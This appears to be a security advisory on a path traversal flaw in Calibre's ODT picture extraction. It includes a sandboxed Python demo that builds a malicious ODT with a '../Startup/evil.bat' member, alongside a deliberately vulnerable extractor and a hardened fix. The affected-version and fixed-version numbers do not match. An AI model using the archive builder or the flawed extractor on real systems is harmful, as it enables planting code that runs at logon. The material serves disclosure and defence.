Calibre Path Traversal Vulnerability in ODT Reader Allowing Arbitrary File Write and Remote Code Execution

Vulnerability

A path traversal vulnerability has been identified in Calibre's ODT reader in versions prior to 9.2.1. An attacker who gets a user to convert a malicious ODT file can write arbitrary content to any location the converting user has write permissions for. On Windows this leads to code execution: a payload written into the user's Startup folder runs at the next logon. The root cause is in the 'extract_pictures' function, which checks only the beginning of each archive member name and does not reject '..' components, so a member name that starts with the expected prefix but climbs out of the extraction directory with '..' passes the check. Calibre's built-in ZipFile.extractall() method does sanitize member paths (dropping '..' components and absolute path prefixes), but 'extract_pictures' bypasses that protection by reading each member manually and writing it to disk at the unsanitized path.

Impact

Successful exploitation gives an attacker an arbitrary file write with the privileges of the user who converts the file. On Windows this escalates to code execution by dropping a payload into the user's Startup folder, where it runs at the next logon.

Reproduction

The vulnerability is triggered by converting a malicious ODT file with Calibre's GUI. Because an ODT file is a ZIP archive, the attacker only needs to add an archive member whose name begins with the prefix 'extract_pictures' expects but contains '..' components pointing at the target directory. During conversion the member is written outside the extraction directory; if the target is the Windows Startup folder, the payload executes the next time the user logs in.
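
To make the mechanism from the Vulnerability section and the malicious ODT from the Reproduction section concrete, the following Python is an added example written for this page, not Calibre's own 'extract_pictures' code. It builds a constructed, in-memory ODT-shaped ZIP containing one traversal member, runs it through a deliberately flawed extractor that mirrors the described pattern (prefix check only, then manual read and write) and through a hardened one, and reports where the files landed. The 'Pictures/' prefix, the member name and the payload are assumptions for illustration; the whole run is confined to a temporary directory so the escaping write lands in a sibling folder we own rather than a real Startup folder.

```python
"""Added example (not Calibre's code): a prefix-only ZIP extractor beside a
hardened one, exercised on a constructed ODT-like archive inside a sandbox."""
import io
import os
import posixpath
import tempfile
import zipfile

PICTURES_PREFIX = "Pictures/"  # assumption: the prefix the real check compares against

# Constructed traversal member: satisfies startswith("Pictures/") yet climbs two
# levels above the extraction directory (depth chosen to stay inside our sandbox).
TRAVERSAL_NAME = "Pictures/../../Startup/evil.bat"


def build_malicious_odt(member_name: str = TRAVERSAL_NAME,
                        payload: bytes = b"@echo off\r\nstart calc.exe\r\n") -> bytes:
    """Return a minimal ODT-shaped ZIP (constructed sample) carrying one traversal member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", "<office:document-content/>")
        zf.writestr("Pictures/cover.png", b"\x89PNG\r\n\x1a\n")  # benign picture
        zf.writestr(member_name, payload)
    return buf.getvalue()


def inside(root: str, path: str) -> bool:
    """True when path (after symlink/.. resolution) lies under root."""
    root, path = os.path.realpath(root), os.path.realpath(path)
    return os.path.commonpath([root, path]) == root


def extract_pictures_vulnerable(odt_bytes: bytes, dest_dir: str) -> list:
    """Flawed pattern: prefix check only, then manual read()/write, so '..' survives."""
    written = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        for name in zf.namelist():
            if not name.startswith(PICTURES_PREFIX) or name.endswith("/"):
                continue
            target = os.path.join(dest_dir, *name.split("/"))  # '..' kept as a component
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as f:
                f.write(zf.read(name))
            written.append(os.path.normpath(target))
    return written


def safe_target(dest_dir: str, name: str):
    """Hardened resolution: reject absolute names, backslashes and drive letters,
    normalize, reject any surviving '..', then confirm the path stays under dest_dir."""
    if name.startswith(("/", "\\")) or "\\" in name or ":" in name:
        return None  # ':' is legal on POSIX; rejecting it is deliberately conservative
    parts = posixpath.normpath(name).split("/")
    if ".." in parts:
        return None
    target = os.path.join(os.path.realpath(dest_dir), *parts)
    return target if inside(dest_dir, target) else None


def extract_pictures_hardened(odt_bytes: bytes, dest_dir: str) -> tuple:
    """Same loop as above, but every member name goes through safe_target() first."""
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        for name in zf.namelist():
            if not name.startswith(PICTURES_PREFIX) or name.endswith("/"):
                continue
            target = safe_target(dest_dir, name)
            if target is None:
                rejected.append(name)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as f:
                f.write(zf.read(name))
            written.append(target)
    return written, rejected


def demo() -> dict:
    """Run both extractors on the constructed ODT and report where files landed."""
    odt = build_malicious_odt()
    with tempfile.TemporaryDirectory() as sandbox:
        out_dir = os.path.join(sandbox, "out")
        os.makedirs(out_dir)
        vuln = extract_pictures_vulnerable(odt, out_dir)
        escaped = [p for p in vuln if not inside(out_dir, p)]  # landed in sandbox/Startup
        safe_dir = os.path.join(sandbox, "safe")
        os.makedirs(safe_dir)
        written, rejected = extract_pictures_hardened(odt, safe_dir)
    return {
        "vulnerable_escaped": [os.path.basename(p) for p in escaped],
        "hardened_rejected": rejected,
        "hardened_written": [os.path.basename(p) for p in written],
    }


if __name__ == "__main__":
    print(demo())
```

Running the script shows the flawed extractor placing 'evil.bat' in a directory beside, not below, its output directory, while the hardened one writes only 'cover.png' and reports the traversal member as rejected. The hardened check normalizes before looking for '..', so a benign internal name such as 'Pictures/a/../b.png' still extracts, and the realpath/commonpath comparison is the backstop in case any other form of escape slips past the string checks.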

Remediation

Update to Calibre version 9.3.0 or later, which includes the fix for this vulnerability.

Added: Feb 20, 2026, 2:37 AM
Updated: Feb 20, 2026, 2:37 AM

Vulnerability Rating (Custom Algorithm)

spread: 6.6
impact: 2.5
exploitability: 5.2
remediation: 7.7
relevance: 3.2
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.